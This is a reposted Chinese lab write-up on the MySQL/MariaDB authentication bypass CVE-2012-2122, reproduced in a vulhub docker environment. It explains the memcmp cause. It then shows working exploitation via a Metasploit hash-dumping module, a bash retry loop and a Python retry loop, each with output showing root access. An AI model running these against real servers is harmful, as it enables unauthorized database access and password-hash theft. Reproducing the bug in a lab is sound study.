热门标签
热门文章
- 1gazebo创建机器人模型04_gazebo怎么修改link名字
- 2代码随想录算法刷题训练营_代码随想录算法训练营
- 3机器学习:利用Spark MLlib实现分布式机器学习算法训练与预测。_简述mllib 如何实现分布式机器学习模型的训练
- 4python_opencv(cv2)模块+灰度图二值化及降噪处理_lenna二值化处理
- 5ELasticSearch-实践-性能优化-外卖搜索-美团技术团队_elasticsearch 围栏
- 6AIGC应用场景(一)_aigc的应用
- 7【unity学习资料】学习进阶
- 8Vue简单的侧边栏_vue 管理平台 不用element-ui 自己写侧边导航栏
- 9完美解决nltk中nltk_data相关文件不能使用的问题_看项目nltk知识引用了 没看到使用
- 10VRRP小练习_the virtual ip address is not within a subnet on t
当前位置: article > 正文
MySQL身份认证绕过漏洞(CVE-2012-2122)_cve-2012-2122的python脚本
作者:神奇cpp | 2024-08-16 08:01:15
赞
踩
cve-2012-2122的python脚本
漏洞介绍
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。
这个缺陷的根源在于memcmp()函数总是返回-128到127(有符号字符)范围内的值。也就是说,只有在Linux系统使用SSE优化库(GNU C库)的场合下才能被利用,成功触发这一漏洞的概率约为1:256。
受影响版本:
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
环境搭建
环境使用vulhub搭建好的docker
配置:mysql(版本:5.5.23) 账号密码:root/123456
漏洞验证
metasploit
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set USERNAME root USERNAME => root msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set RHOSTS 192.168.31.23 RHOSTS => 192.168.31.23 msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run [+] 192.168.31.23:3306 - 192.168.31.23:3306 The server allows logins, proceeding with bypass test [+] 192.168.31.23:3306 - 192.168.31.23:3306 Successfully bypassed authentication after 64 attempts. URI: mysql://root:ZoSnI@192.168.31.23:3306 [+] 192.168.31.23:3306 - 192.168.31.23:3306 Successfully exploited the authentication bypass flaw, dumping hashes... [+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 [+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 [+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 [+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 [+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 [+] 192.168.31.23:3306 - 192.168.31.23:3306 Hash Table has been saved: /root/.msf4/loot/20190714220813_default_192.168.31.23_mysql.hashes_963184.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
bash
for i inseq 1 1000; do mysql -u root --password=bad -h IP 2>/dev/null; done
root@kali:~# for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.31.23 2>/dev/null; done Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 6065 Server version: 5.5.23 Source distribution Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | test | +--------------------+ 4 rows in set (0.00 sec) MySQL [(none)]>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
python
代码
#a.py
#!/usr/bin/python
import subprocess
while 1:
subprocess.Popen("mysql -u root mysql -h IP --password=baah", shell=True).wait()
- 1
- 2
- 3
- 4
- 5
结果显示
root@kali:~# python a.py ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ...... ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 8064 Server version: 5.5.23 Source distribution Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [mysql]>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
参考文章:
https://www.freebuf.com/vuls/3815.html
https://www.jianshu.com/p/909bfe51c468
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/神奇cpp/article/detail/987235
推荐阅读
相关标签
